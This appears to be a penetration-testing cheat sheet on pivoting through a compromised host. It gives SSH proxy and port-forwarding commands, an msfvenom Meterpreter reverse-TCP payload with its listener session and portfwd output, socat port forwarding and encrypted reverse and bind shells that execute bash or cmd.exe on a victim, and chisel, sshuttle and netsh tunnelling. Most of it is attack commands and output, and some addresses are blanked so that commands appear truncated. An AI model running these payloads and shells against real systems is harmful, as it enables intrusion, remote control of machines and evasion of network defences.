Skip to content

Proxy & Port forwarding

2 methods :

  • Tunnelling/Proxying: Creating a proxy type connection through a compromised machine in order to route all desired traffic into the targeted network. This could potentially also be tunnelled inside another protocol (e.g. SSH tunnelling), which can be useful for evading a basic Intrusion Detection System (IDS) or firewall.
  • Port Forwarding: Creating a connection between a local port and a single port on a target, via a compromised host.

Port Forwarding tends to be faster and more reliable, but only allows us to access a single port (or a small range) on a target device.

Using SSH


Proxy :

ssh -D 8080 -fN

Proxy : socks5://

ssh -g -D 9050 -fN

Port forwarding (local)

The machine has a web server running on port 8000 internally (not exposed to the internet). With the following command you can now access the web server from http://localhost:4444.

ssh -L 4444: -fN
  • -f : Backgrounds ssh.
  • -N : Do not execute a remote command.

Port forwarding (remote)

Goal : localhost:4444 -> host1:4444 -> host2:80

Listen on all interfaces :

# localhost:4444 -> host1:4444 -> host2:80
ssh -R user@host1 -fN


You need also to configure SSH daemon on target host to allow client to specify the bind_address. It is prohibited by default to listen to all interfaces. So, you will always find it listening on loopback even if you specifiy as bind_address.

When you cannot listen on all interfaces :

# localhost:4444 -> host1:4444
ssh -L 4444: user@host1 -fN
# host1:4444 -> host2:80
ssh -R 4444:host2:80 user@host1 -fN

Using metasploit (meterpreter)

Port forwarding

  • Generate the exploit with msfvenom.
$ msfvenom -p 'linux/x64/meterpreter_reverse_tcp' LHOST= LPORT=9001 -f elf > exploit.bin
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1037272 bytes
Final size of elf file: 1037272 bytes

$ file exploit.bin
exploit.bin: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), static-pie linked, with debug_info, not stripped
  • Setup listener
$ msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST ens4
msf6 exploit(multi/handler) > set LPORT 9001
LPORT => 9001
msf6 exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_tcp
PAYLOAD => linux/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on
[*] Meterpreter session 1 opened ( -> ) at 2021-10-19 19:27:31 +0000

meterpreter >
  • Do port forwarding
meterpreter > portfwd add -l 4444 -p 8000 -r
[*] Local TCP relay created: :4444 <->
meterpreter > portfwd list

Active Port Forwards

   Index  Local           Remote        Direction
   -----  -----           ------        ---------
   1  Forward

1 total active port forwards.

meterpreter > portfwd delete -l 4444 -p 8000 -r
[*] Successfully stopped TCP relay on

-l : Port on your local machine (attacker machine). -p : Port on the remote machine (victim machine). -r : Target host.

Using socat

Port forwarding

./socat tcp-l:33060,fork,reuseaddr tcp: &

Listent on 33060, then redirect to

  • fork : create new process for every connection.
  • reuseaddr : port stays open after a connection close.

Encrypted shell

Generate certificates :

openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem
Reverse shell :

# Listener (attacker)
socat OPENSSL-LISTEN:4444,cert=shell.pem,verify=0 -

# Connection (victim)
./socat OPENSSL:,verify=0 EXEC:/bin/bash

Bind shell :

# Listener (victim)
./socat OPENSSL-LISTEN:4444,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes

# Connection (attacker)
socat OPENSSL:,verify=0 -

Using chisel

Link : chisel.

Port fowarding

Example : localhost:8081 -> victim:8080 (from local)

# Listener (attacker on
./chisel server -p 4444 --reverse

# Connection (victim)
./chisel client R:8081:

Using sshuttle

Link : sshuttle.

Sshuttle acts as a VPN and allows us to pass our traffic targeting the victim's network through the victim machine. Sshuttle uses the SSH protocol, so communications are encrypted.

# SSH (user / password)
sudo sshuttle -r user@ -N
# SSH (private key)
sudo sshuttle -r user@ -N --ssh-cmd 'ssh -i id_rsa'

# Manually set the network range
sudo sshuttle -r user@
# or
sudo sshuttle -r user@ -x

Practical example :

$ sudo sshuttle -r root@ -N --ssh-cmd 'ssh -i id_rsa -o StrictHostKeychecking=no' &
[1] 6803
c : Connected to server.
#, same network as
$ curl
<!DOCTYPE html>
<html lang="en">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <title>Page not found at /</title>
  <meta name="robots" content="NONE,NOARCHIVE">
  <style type="text/css">

Using netsh (Windows)

Port fowarding ->

C:\> netsh advfirewall firewall add rule name="portfwd" dir=in action=allow protocol=tcp localport=21000
C:\> netsh interface portproxy add v4tov4 listenport=21000 listenaddress= connectport=80 connectaddress=